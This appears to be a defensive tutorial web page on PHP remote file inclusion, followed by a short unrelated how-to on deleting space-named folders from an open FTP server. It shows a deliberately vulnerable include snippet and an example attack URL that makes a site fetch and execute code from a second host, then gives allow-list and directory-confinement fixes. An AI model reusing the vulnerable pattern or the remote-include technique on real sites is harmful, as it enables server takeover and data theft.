What is Code Injection and How to Prevent It

There has been a sudden increase of attacks on sites that have Code Injection vulnerabilities. Code Injection is the term used when code from an outside source is injected straight into a program or script and executed at some point in time. This type of vulnerability can be far worse than most others, since the security of the web site, and possibly of the whole server, is compromised.

Example:

This example will help you understand what a Code Injection vulnerability looks like in its simplest form, and unfortunately, this snippet is actually used on quite a few web sites.

HTML header

<?php
$page = $_GET['page']; // value supplied by the browser (the original relied on register_globals)
include($page);        // the vulnerable line: whatever the visitor sent is included and executed
?>

HTML footer

Note: There is no PHP code in the header or footer; they are just HTML.

To some, this is obviously a big mistake. The '$page' variable is never checked, so an attacker can choose what to include. So how does one exploit the above code?

Example Exploit:

An attacker can create a 'txt' file on another server and have it included by the above example. If the attacker puts PHP code in this 'txt' file, it will be executed on the exploited host.

<?php
phpinfo();
?>

Let's say the vulnerable code is located at 'http://domain/index.php' and the 'txt' file is located at 'http://domain2/code.txt'; then the attacker would enter something like this into his browser:

http://domain/index.php?page=http://domain2/code.txt

The end result is that the exploited web site executes the command 'phpinfo()' between the header and footer, where the PHP include is located.

Explanation:

If you had no problem understanding why this would happen, feel free to skip this section.

The include() function takes the contents of the file named in the parentheses and inserts them at the point where the include is executed. So let us run through the program in our minds, assuming the URL mentioned above is entered into a browser. The URL sets the variable $page to 'http://domain2/code.txt', so let us replace every $page variable with this string:

HTML header

<?php
include('http://domain2/code.txt');
?>

HTML footer

Now the include function fetches the code from the URL/file mentioned and places it where the include was called, so the result would be:

HTML header

<?php
phpinfo();
?>

HTML footer

This is what the server ends up processing. The header is displayed, then the PHP call phpinfo() is executed, followed by the footer at the end.

What can happen:

The above example executed harmless code, but an attacker can execute far more malicious code.

  • An attacker can output the raw contents of any PHP file to the browser, where he can possibly obtain the SQL login/password for your database.
  • An attacker can use your web site to send out large amounts of spam to various email addresses.
  • An attacker can deface your web site.
  • An attacker can obtain private information.
  • An attacker may gain access to the whole server.

This is why it is important to secure your web site, and not leave such vulnerabilities open for attack.

Solution:

There is a very simple solution to the above example, and that is to check the variable. In the above example, 99% of the time you know what values $page should take, and therefore can check whether that is the case.

HTML header

<?php
$page = $_GET['page']; // value supplied by the browser (the original relied on register_globals)

//list of valid pages
$pages = array("games/index.html", "news/news.html", "games/1.html");

//check $page variable against the list; stop as soon as a match is found
$valid = false;
for ($i = 0; $i < sizeof($pages) && !$valid; $i++) {
    if ($page === $pages[$i]) {
        $valid = true;
    }
}
if ($valid) include($page);
if (!$valid) include($pages[0]); // include the first page if not valid
?>

HTML footer

Another Solution:

Another solution is to strip invalid characters from the variable and to keep all the page files together in a separate directory.

Example of where the pages are placed:

  • pages/games.html
  • pages/news.html
  • pages/games-1.html

Code:

HTML header

<?php
$page = $_GET['page']; // value supplied by the browser (the original relied on register_globals)
$invalidChars = array("/", ".", "\\", "\"", ";");
$page = str_replace($invalidChars, "", $page); // remove anything that could escape the pages/ directory
include("pages/" . $page . ".html");
?>

HTML footer
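The two solutions above (the list of valid pages and the separate pages/ directory) can be combined into one dispatcher. The following is an added example written for this article, not code from the original; it assumes a pages/ directory next to the script containing the three files listed above, and the ?page= parameter now carries a short key rather than a file name. The user-supplied value is only ever used as an array key, and realpath() is used as a second check that the resolved file really lives under pages/.

```php
<?php
// Added example: allow-list plus directory confinement for a ?page= include.
// Assumes ./pages/games.html, ./pages/news.html and ./pages/games-1.html exist.
declare(strict_types=1);

// Allow-list: user-facing keys mapped to files we actually ship.
const PAGES = [
    'games'   => 'games.html',
    'news'    => 'news.html',
    'games-1' => 'games-1.html',
];
const PAGE_DIR = __DIR__ . '/pages';

/**
 * Resolve the ?page= value to an absolute path inside PAGE_DIR, or return
 * null when the request does not name one of the known pages.
 */
function resolvePage(?string $requested): ?string
{
    // Missing parameter means the default page; anything else must match exactly.
    if ($requested === null || $requested === '') {
        $requested = 'games';
    }
    // Cheap first filter: keys are short and use a tiny character set.
    if (!preg_match('/^[a-z0-9-]{1,32}$/', $requested)) {
        return null;
    }
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    // realpath() collapses ../ and symlinks; confirm the result is still under pages/.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// ?page[]=x would arrive as an array; treat anything that is not a string as absent.
$raw  = $_GET['page'] ?? null;
$page = resolvePage(is_string($raw) ? $raw : null);

echo "<!-- HTML header -->\n";
if ($page === null) {
    // Reject rather than silently fall back, so probing shows up in the logs.
    http_response_code(404);
    error_log('rejected page parameter: ' . var_export($raw, true));
    echo "<p>Page not found.</p>\n";
} else {
    // The pages are static HTML, so readfile() is enough; unlike include(),
    // it never executes PHP that might be inside the file.
    readfile($page);
}
echo "<!-- HTML footer -->\n";
```

Because the browser-supplied value never reaches a file system or URL function, remote files cannot be pulled in at all, and the realpath() check catches mistakes in the allow-list itself (for example an entry that accidentally points outside pages/). Current PHP versions also ship with allow_url_include off and no longer support register_globals, which removes the exact mechanism the original snippet relied on, but validating the parameter is still what keeps the include safe.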

Remove Filename and Directories that have no name

Operating an open FTP server can be a risky ordeal, especially if anonymous users may upload files to it. There are people out there who scan blocks of IPs for such open servers and may use them to store illegal software, some of whom use tricky folder names such as ' ' (a space). This quick article will explain how to remove such a folder/file on a Windows machine.

1. Empty out the folder in question (if it is a folder). You should be able to do this with Explorer.
2. Open 'Command Prompt' by:
clicking 'Start' -> click 'Run' -> type 'cmd' (without the quotes) -> hit the 'Enter' key
3. Navigate in the command prompt to the folder containing the offending folder/file.

If the path of the offending folder/file is "C:\path\to\folder\" then you can type "cd \path\to\folder\" and hit 'Enter'.

4. Find the short name for the folder/file by using the command 'dir' with the parameter /x, which lists the 8.3 short name next to each entry.

For example:

dir /x

Example of a short name:

0200~1

5. Use this short name to remove the folder/file.

If it is a file with the short name ‘0200~1’:

del 0200~1

If it is a folder with the short name ‘0200~1’:

rmdir 0200~1